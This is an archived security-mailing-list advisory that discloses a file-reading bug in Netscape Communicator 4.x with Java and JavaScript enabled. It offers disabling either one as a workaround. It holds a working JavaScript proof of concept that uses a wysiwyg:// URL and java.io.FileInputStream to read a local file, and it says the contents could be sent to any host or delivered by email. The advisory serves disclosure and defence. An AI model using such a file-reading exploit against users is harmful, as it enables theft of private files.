There is a bug in Netscape Communicator 4.5 for Windows 95 and 4.05 for WinNT 4.0 (probably others) which allows reading files from the user's computer. It is not necessary the file name to be known, because directories may be browsed. The contents of the file may be sent to an arbitrary host. In order this to work, you need both Java and Javascript enabled. The bug may be exploited by email message. Demonstration is available at: http://www.geocities.com/ResearchTriangle/1711/b6.html Workaround: Disable Javascript or Java. The Javascript code is: sl=window.open("wysiwyg://1/file:///C|/"); sl2=sl.window.open(); sl2.location="javascript:s='<SCRIPT>b=\"Here is the beginning of your file: \";var f = new java.io.File(\"C:\\\\\\\\test.txt\");var fis = new java.io.FileInputStream(f); i=0; while ( ((a=fis.read()) != -1) && (i<100) ) { b += String.fromCharCode(a);i++;}alert(b);</'+'SCRIPT>'"; Regards, Georgi Guninski http://www.geocities.com/ResearchTriangle/1711 ______________________________________________________ Get Your Private, Free Email at http://www.hotmail.com
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:24:03 PDT